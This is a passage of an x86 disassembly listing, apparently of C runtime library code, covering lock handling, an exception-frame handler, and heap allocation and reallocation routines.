mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov [eax], edx
mov eax, [ebp+var_8]
mov dword ptr [eax+4], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_422F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422FE0 proc near ; CODE XREF: sub_422400+3�p
push ebp
mov ebp, esp
push 1
call sub_422FF0
add esp, 4
pop ebp
retn
sub_422FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422FF0 proc near ; CODE XREF: _0:00422E8C�p
; sub_422FE0+5�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov [ebp+var_8], 0
push 2
call sub_423280
add esp, 4
mov [ebp+var_C], 0
jmp short loc_423020
; ---------------------------------------------------------------------------
loc_423017: ; CODE XREF: sub_422FF0:loc_42310E�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_423020: ; CODE XREF: sub_422FF0+25�j
mov ecx, [ebp+var_C]
cmp ecx, ds:dword_4F4A20
jge loc_423113
mov edx, [ebp+var_C]
mov eax, ds:dword_4F3A14
cmp dword ptr [eax+edx*4], 0
jz loc_42310E
mov ecx, [ebp+var_C]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
mov ecx, [eax+0Ch]
and ecx, 83h
test ecx, ecx
jz loc_42310E
mov edx, [ebp+var_C]
mov eax, ds:dword_4F3A14
mov ecx, [eax+edx*4]
push ecx
mov edx, [ebp+var_C]
push edx
call sub_422460
add esp, 8
mov eax, [ebp+var_C]
mov ecx, ds:dword_4F3A14
mov edx, [ecx+eax*4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_4230F5
cmp [ebp+arg_0], 1
jnz short loc_4230B9
mov ecx, [ebp+var_C]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
push eax
call sub_422ED0
add esp, 4
cmp eax, 0FFFFFFFFh
jz short loc_4230B7
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4230B7: ; CODE XREF: sub_422FF0+BC�j
jmp short loc_4230F5
; ---------------------------------------------------------------------------
loc_4230B9: ; CODE XREF: sub_422FF0+A2�j
cmp [ebp+arg_0], 0
jnz short loc_4230F5
mov edx, [ebp+var_C]
mov eax, ds:dword_4F3A14
mov ecx, [eax+edx*4]
mov edx, [ecx+0Ch]
and edx, 2
test edx, edx
jz short loc_4230F5
mov eax, [ebp+var_C]
mov ecx, ds:dword_4F3A14
mov edx, [ecx+eax*4]
push edx
call sub_422ED0
add esp, 4
cmp eax, 0FFFFFFFFh
jnz short loc_4230F5
mov [ebp+var_8], 0FFFFFFFFh
loc_4230F5: ; CODE XREF: sub_422FF0+9C�j
; sub_422FF0:loc_4230B7�j ...
mov eax, [ebp+var_C]
mov ecx, ds:dword_4F3A14
mov edx, [ecx+eax*4]
push edx
mov eax, [ebp+var_C]
push eax
call sub_4224D0
add esp, 8
loc_42310E: ; CODE XREF: sub_422FF0+4B�j
; sub_422FF0+68�j
jmp loc_423017
; ---------------------------------------------------------------------------
loc_423113: ; CODE XREF: sub_422FF0+39�j
push 2
call sub_423320
add esp, 4
cmp [ebp+arg_0], 1
jnz short loc_423128
mov eax, [ebp+var_4]
jmp short loc_42312B
; ---------------------------------------------------------------------------
loc_423128: ; CODE XREF: sub_422FF0+131�j
mov eax, [ebp+var_8]
loc_42312B: ; CODE XREF: sub_422FF0+136�j
mov esp, ebp
pop ebp
retn
sub_422FF0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push 9
call sub_423280
add esp, 4
mov eax, ds:dword_4F3378
mov [ebp-4], eax
mov ecx, [ebp+8]
mov ds:dword_4F3378, ecx
push 9
call sub_423320
add esp, 4
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:dword_4F3378
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423170 proc near ; CODE XREF: sub_41BEC0+7D�p
; sub_423460+41�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3378
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_423190
mov ecx, [ebp+arg_0]
push ecx
call [ebp+var_4]
add esp, 4
test eax, eax
jnz short loc_423194
loc_423190: ; CODE XREF: sub_423170+10�j
xor eax, eax
jmp short loc_423199
; ---------------------------------------------------------------------------
loc_423194: ; CODE XREF: sub_423170+1E�j
mov eax, 1
loc_423199: ; CODE XREF: sub_423170+22�j
mov esp, ebp
pop ebp
retn
sub_423170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4231A0 proc near ; CODE XREF: sub_428E00+4�p
push ebp
mov ebp, esp
mov eax, ds:off_451B34
push eax
call ds:dword_4F54A4 ; InitializeCriticalSection
mov ecx, ds:off_451B24
push ecx
call ds:dword_4F54A4 ; InitializeCriticalSection
mov edx, ds:off_451B14
push edx
call ds:dword_4F54A4 ; InitializeCriticalSection
mov eax, ds:off_451AF4
push eax
call ds:dword_4F54A4 ; InitializeCriticalSection
pop ebp
retn
sub_4231A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4231E0 proc near ; CODE XREF: _0:00428E93�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_4231F6
; ---------------------------------------------------------------------------
loc_4231ED: ; CODE XREF: sub_4231E0:loc_423247�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4231F6: ; CODE XREF: sub_4231E0+B�j
cmp [ebp+var_4], 30h
jge short loc_423249
mov ecx, [ebp+var_4]
cmp ds:dword_451AF0[ecx*4], 0
jz short loc_423247
cmp [ebp+var_4], 11h
jz short loc_423247
cmp [ebp+var_4], 0Dh
jz short loc_423247
cmp [ebp+var_4], 9
jz short loc_423247
cmp [ebp+var_4], 1
jz short loc_423247
mov edx, [ebp+var_4]
mov eax, ds:dword_451AF0[edx*4]
push eax
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
push 2
mov ecx, [ebp+var_4]
mov edx, ds:dword_451AF0[ecx*4]
push edx
call sub_41CA10
add esp, 8
loc_423247: ; CODE XREF: sub_4231E0+27�j
; sub_4231E0+2D�j ...
jmp short loc_4231ED
; ---------------------------------------------------------------------------
loc_423249: ; CODE XREF: sub_4231E0+1A�j
mov eax, ds:off_451B14
push eax
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
mov ecx, ds:off_451B24
push ecx
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
mov edx, ds:off_451B34
push edx
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
mov eax, ds:off_451AF4
push eax
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
mov esp, ebp
pop ebp
retn
sub_4231E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423280 proc near ; CODE XREF: sub_41BEC0+25�p
; sub_41C360+25�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ds:dword_451AF0[eax*4], 0
jnz short loc_423302
push 0E1h
push offset aMlock_c ; "mlock.c"
push 2
push 18h
call sub_41BE70
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4232BA
push 11h
call sub_422270
add esp, 4
loc_4232BA: ; CODE XREF: sub_423280+2E�j
push 11h
call sub_423280
add esp, 4
mov ecx, [ebp+arg_0]
cmp ds:dword_451AF0[ecx*4], 0
jnz short loc_4232EA
mov edx, [ebp+var_4]
push edx
call ds:dword_4F54A4 ; InitializeCriticalSection
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov ds:dword_451AF0[eax*4], ecx
jmp short loc_4232F8
; ---------------------------------------------------------------------------
loc_4232EA: ; CODE XREF: sub_423280+4F�j
push 2
mov edx, [ebp+var_4]
push edx
call sub_41CA10
add esp, 8
loc_4232F8: ; CODE XREF: sub_423280+68�j
push 11h
call sub_423320
add esp, 4
loc_423302: ; CODE XREF: sub_423280+F�j
mov eax, [ebp+arg_0]
mov ecx, ds:dword_451AF0[eax*4]
push ecx
call ds:dword_4F53A8 ; RtlEnterCriticalSection
mov esp, ebp
pop ebp
retn
sub_423280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423320 proc near ; CODE XREF: sub_41BF1D+2�p
; sub_41C3C3+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, ds:dword_451AF0[eax*4]
push ecx
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
pop ebp
retn
sub_423320 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
push 0
call ds:dword_4F54A8 ; FatalAppExitA
push 0FFh
call ds:off_4F5338
pop ebp
retn
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423364 proc near ; DATA XREF: sub_41BEC0+A�o
; sub_41C360+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_423404
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_423397: ; CODE XREF: sub_423364+90�j
cmp esi, 0FFFFFFFFh
jz short loc_4233FD
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_4233EB
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_4233EB
js short loc_4233F6
mov edi, [ebx+8]
push ebx
call sub_420730
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_420772
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_420806
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_4233EB: ; CODE XREF: sub_423364+40�j
; sub_423364+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_423397
; ---------------------------------------------------------------------------
loc_4233F6: ; CODE XREF: sub_423364+54�j
mov eax, 0
jmp short loc_423419
; ---------------------------------------------------------------------------
loc_4233FD: ; CODE XREF: sub_423364+36�j
mov eax, 1
jmp short loc_423419
; ---------------------------------------------------------------------------
loc_423404: ; CODE XREF: sub_423364+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_420772
add esp, 8
pop ebp
mov eax, 1
loc_423419: ; CODE XREF: sub_423364+97�j
; sub_423364+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_423364 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_420772
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423440 proc near ; CODE XREF: sub_423830+33�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3374
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_423460
add esp, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_423440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423460 proc near ; CODE XREF: sub_423440+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFE0h
jbe short loc_42346E
xor eax, eax
jmp short loc_4234B3
; ---------------------------------------------------------------------------
loc_42346E: ; CODE XREF: sub_423460+8�j
; sub_423460:loc_4234B1�j
cmp [ebp+arg_0], 0FFFFFFE0h
ja short loc_423485
mov eax, [ebp+arg_0]
push eax
call sub_4234C0
add esp, 4
mov [ebp+var_4], eax
jmp short loc_42348C
; ---------------------------------------------------------------------------
loc_423485: ; CODE XREF: sub_423460+12�j
mov [ebp+var_4], 0
loc_42348C: ; CODE XREF: sub_423460+23�j
cmp [ebp+var_4], 0
jnz short loc_423498
cmp [ebp+arg_4], 0
jnz short loc_42349D
loc_423498: ; CODE XREF: sub_423460+30�j
mov eax, [ebp+var_4]
jmp short loc_4234B3
; ---------------------------------------------------------------------------
loc_42349D: ; CODE XREF: sub_423460+36�j
mov ecx, [ebp+arg_0]
push ecx
call sub_423170
add esp, 4
test eax, eax
jnz short loc_4234B1
xor eax, eax
jmp short loc_4234B3
; ---------------------------------------------------------------------------
loc_4234B1: ; CODE XREF: sub_423460+4B�j
jmp short loc_42346E
; ---------------------------------------------------------------------------
loc_4234B3: ; CODE XREF: sub_423460+C�j
; sub_423460+3B�j ...
mov esp, ebp
pop ebp
retn
sub_423460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234C0 proc near ; CODE XREF: sub_41BF80+19D�p
; sub_423460+18�p
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423530 SIZE 00000077 BYTES
; FUNCTION CHUNK AT 004235B2 SIZE 0000005B BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D048
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
cmp ds:dword_4F39EC, 3
jnz short loc_423543
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F3A0C
ja short loc_42353E
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
push ecx
call sub_424790
add esp, 4
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_423525
jmp short loc_423530
sub_4234C0 endp
; =============== S U B R O U T I N E =======================================
sub_423525 proc near ; CODE XREF: sub_4234C0+5E�p
; DATA XREF: _1:0043D050�o
push 9
call sub_423320
add esp, 4
retn
sub_423525 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4234C0
loc_423530: ; CODE XREF: sub_4234C0+63�j
cmp [ebp+var_1C], 0
jz short loc_42353E
mov eax, [ebp+var_1C]
jmp loc_4235FC
; ---------------------------------------------------------------------------
loc_42353E: ; CODE XREF: sub_4234C0+35�j
; sub_4234C0+74�j
jmp loc_4235D1
; ---------------------------------------------------------------------------
loc_423543: ; CODE XREF: sub_4234C0+2A�j
cmp ds:dword_4F39EC, 2
jnz loc_4235D1
cmp [ebp+arg_0], 0
jz short loc_423564
mov edx, [ebp+arg_0]
add edx, 0Fh
and edx, 0FFFFFFF0h
mov [ebp+arg_0], edx
jmp short loc_42356B
; ---------------------------------------------------------------------------
loc_423564: ; CODE XREF: sub_4234C0+94�j
mov [ebp+arg_0], 10h
loc_42356B: ; CODE XREF: sub_4234C0+A2�j
mov eax, [ebp+arg_0]
cmp eax, ds:dword_453BDC
ja short loc_4235BD
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 1
mov ecx, [ebp+arg_0]
shr ecx, 4
push ecx
call sub_426210
add esp, 4
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_4235A7
jmp short loc_4235B2
; END OF FUNCTION CHUNK FOR sub_4234C0
; =============== S U B R O U T I N E =======================================
sub_4235A7 proc near ; CODE XREF: sub_4234C0+E0�p
; DATA XREF: _1:0043D05C�o
push 9
call sub_423320
add esp, 4
retn
sub_4235A7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4234C0
loc_4235B2: ; CODE XREF: sub_4234C0+E5�j
cmp [ebp+var_1C], 0
jz short loc_4235BD
mov eax, [ebp+var_1C]
jmp short loc_4235FC
; ---------------------------------------------------------------------------
loc_4235BD: ; CODE XREF: sub_4234C0+B4�j
; sub_4234C0+F6�j
mov edx, [ebp+arg_0]
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
jmp short loc_4235FC
; ---------------------------------------------------------------------------
loc_4235D1: ; CODE XREF: sub_4234C0:loc_42353E�j
; sub_4234C0+8A�j
cmp [ebp+arg_0], 0
jnz short loc_4235DE
mov [ebp+arg_0], 1
loc_4235DE: ; CODE XREF: sub_4234C0+115�j
mov ecx, [ebp+arg_0]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_0]
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
loc_4235FC: ; CODE XREF: sub_4234C0+79�j
; sub_4234C0+FB�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4234C0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423610 proc near ; CODE XREF: sub_41BF80+79�p
; sub_41C3F0+C1�p ...
push ebp
mov ebp, esp
mov eax, 1
pop ebp
retn
sub_423610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423620 proc near ; CODE XREF: sub_41C3F0+2D4�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004236CC SIZE 000000EE BYTES
; FUNCTION CHUNK AT 004237C5 SIZE 00000068 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D060
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0FFFFFFE0h
jbe short loc_423650
xor eax, eax
jmp loc_42381C
; ---------------------------------------------------------------------------
loc_423650: ; CODE XREF: sub_423620+27�j
cmp ds:dword_4F39EC, 3
jnz loc_423708
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call sub_4240F0
add esp, 4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4236B3
mov [ebp+var_1C], 0
mov ecx, [ebp+arg_4]
cmp ecx, ds:dword_4F3A0C
ja short loc_4236B3
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_20]
push ecx
call sub_424FD0
add esp, 0Ch
test eax, eax
jz short loc_4236B3
mov edx, [ebp+arg_0]
mov [ebp+var_1C], edx
loc_4236B3: ; CODE XREF: sub_423620+61�j
; sub_423620+73�j ...
mov [ebp+var_4], 0FFFFFFFFh
call sub_4236C1
jmp short loc_4236CC
sub_423620 endp
; =============== S U B R O U T I N E =======================================
sub_4236C1 proc near ; CODE XREF: sub_423620+9A�p
; DATA XREF: _1:0043D068�o
push 9
call sub_423320
add esp, 4
retn
sub_4236C1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423620
loc_4236CC: ; CODE XREF: sub_423620+9F�j
cmp [ebp+var_20], 0
jnz short loc_423703
cmp [ebp+arg_4], 0
jnz short loc_4236DF
mov [ebp+arg_4], 1
loc_4236DF: ; CODE XREF: sub_423620+B6�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_423703: ; CODE XREF: sub_423620+B0�j
jmp loc_423819
; ---------------------------------------------------------------------------
loc_423708: ; CODE XREF: sub_423620+37�j
cmp ds:dword_4F39EC, 2
jnz loc_4237E6
cmp [ebp+arg_4], 0
jnz short loc_423722
mov [ebp+arg_4], 1
loc_423722: ; CODE XREF: sub_423620+F9�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 1
lea edx, [ebp+var_24]
push edx
lea eax, [ebp+var_2C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_426110
add esp, 0Ch
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4237AC
mov [ebp+var_1C], 0
mov edx, [ebp+arg_4]
cmp edx, ds:dword_453BDC
ja short loc_423793
mov eax, [ebp+arg_4]
shr eax, 4
push eax
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_2C]
push eax
call sub_426880
add esp, 10h
test eax, eax
jz short loc_423793
mov ecx, [ebp+arg_0]
mov [ebp+var_1C], ecx
loc_423793: ; CODE XREF: sub_423620+14C�j
; sub_423620+16B�j
push 0FFFFFFFFh
mov edx, [ebp+var_1C]
mov [ebp+var_30], edx
lea eax, [ebp+var_10]
push eax
call sub_420772
add esp, 8
mov eax, [ebp+var_30]
jmp short loc_42381C
; ---------------------------------------------------------------------------
loc_4237AC: ; CODE XREF: sub_423620+13A�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_4237BA
jmp short loc_4237C5
; END OF FUNCTION CHUNK FOR sub_423620
; =============== S U B R O U T I N E =======================================
sub_4237BA proc near ; CODE XREF: sub_423620+193�p
; DATA XREF: _1:0043D074�o
push 9
call sub_423320
add esp, 4
retn
sub_4237BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423620
loc_4237C5: ; CODE XREF: sub_423620+198�j
cmp [ebp+var_28], 0
jnz short loc_4237E4
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_4237E4: ; CODE XREF: sub_423620+1A9�j
jmp short loc_423819
; ---------------------------------------------------------------------------
loc_4237E6: ; CODE XREF: sub_423620+EF�j
cmp [ebp+arg_4], 0
jnz short loc_4237F3
mov [ebp+arg_4], 1
loc_4237F3: ; CODE XREF: sub_423620+1CA�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 10h
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_423819: ; CODE XREF: sub_423620:loc_423703�j
; sub_423620:loc_4237E4�j
mov eax, [ebp+var_1C]
loc_42381C: ; CODE XREF: sub_423620+2B�j
; sub_423620+18A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423620
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423830 proc near ; CODE XREF: sub_41C3F0+2AF�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00423A03 SIZE 0000020C BYTES
; FUNCTION CHUNK AT 00423C1A SIZE 000000A9 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D078
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFC8h
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
cmp [ebp+arg_0], 0
jnz short loc_423870
mov ecx, [ebp+arg_4]
push ecx
call sub_423440
add esp, 4
jmp loc_423CB2
; ---------------------------------------------------------------------------
loc_423870: ; CODE XREF: sub_423830+2D�j
cmp [ebp+arg_4], 0
jnz short loc_423889
mov edx, [ebp+arg_0]
push edx
call sub_423CD0
add esp, 4
xor eax, eax
jmp loc_423CB2
; ---------------------------------------------------------------------------
loc_423889: ; CODE XREF: sub_423830+44�j
cmp ds:dword_4F39EC, 3
jnz loc_423A6F
loc_423896: ; CODE XREF: sub_423830:loc_423A6A�j
mov [ebp+var_24], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_423A3C
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call sub_4240F0
add esp, 4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_4239EA
mov ecx, [ebp+arg_4]
cmp ecx, ds:dword_4F3A0C
ja loc_42396A
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_28]
push ecx
call sub_424FD0
add esp, 0Ch
test eax, eax
jz short loc_423900
mov edx, [ebp+arg_0]
mov [ebp+var_24], edx
jmp short loc_42396A
; ---------------------------------------------------------------------------
loc_423900: ; CODE XREF: sub_423830+C6�j
mov eax, [ebp+arg_4]
push eax
call sub_424790
add esp, 4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_42396A
mov ecx, [ebp+arg_0]
mov edx, [ecx-4]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp eax, [ebp+arg_4]
jnb short loc_423931
mov ecx, [ebp+var_20]
mov [ebp+var_3C], ecx
jmp short loc_423937
; ---------------------------------------------------------------------------
loc_423931: ; CODE XREF: sub_423830+F7�j
mov edx, [ebp+arg_4]
mov [ebp+var_3C], edx
loc_423937: ; CODE XREF: sub_423830+FF�j
mov eax, [ebp+var_3C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_24]
push edx
call sub_41FBF0
add esp, 0Ch
mov eax, [ebp+arg_0]
push eax
call sub_4240F0
add esp, 4
mov [ebp+var_28], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_28]
push edx
call sub_4241B0
add esp, 8
loc_42396A: ; CODE XREF: sub_423830+AA�j
; sub_423830+CE�j ...
cmp [ebp+var_24], 0
jnz short loc_4239EA
cmp [ebp+arg_4], 0
jnz short loc_42397D
mov [ebp+arg_4], 1
loc_42397D: ; CODE XREF: sub_423830+144�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5418 ; RtlAllocateHeap
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4239EA
mov eax, [ebp+arg_0]
mov ecx, [eax-4]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
cmp edx, [ebp+arg_4]
jnb short loc_4239C0
mov eax, [ebp+var_20]
mov [ebp+var_40], eax
jmp short loc_4239C6
; ---------------------------------------------------------------------------
loc_4239C0: ; CODE XREF: sub_423830+186�j
mov ecx, [ebp+arg_4]
mov [ebp+var_40], ecx
loc_4239C6: ; CODE XREF: sub_423830+18E�j
mov edx, [ebp+var_40]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_24]
push ecx
call sub_41FBF0
add esp, 0Ch
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_28]
push eax
call sub_4241B0
add esp, 8
loc_4239EA: ; CODE XREF: sub_423830+9B�j
; sub_423830+13E�j ...
mov [ebp+var_4], 0FFFFFFFFh
call sub_4239F8
jmp short loc_423A03
sub_423830 endp
; =============== S U B R O U T I N E =======================================
sub_4239F8 proc near ; CODE XREF: sub_423830+1C1�p
; DATA XREF: _1:0043D080�o
push 9
call sub_423320
add esp, 4
retn
sub_4239F8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423830
loc_423A03: ; CODE XREF: sub_423830+1C6�j
cmp [ebp+var_28], 0
jnz short loc_423A3C
cmp [ebp+arg_4], 0
jnz short loc_423A16
mov [ebp+arg_4], 1
loc_423A16: ; CODE XREF: sub_423830+1DD�j
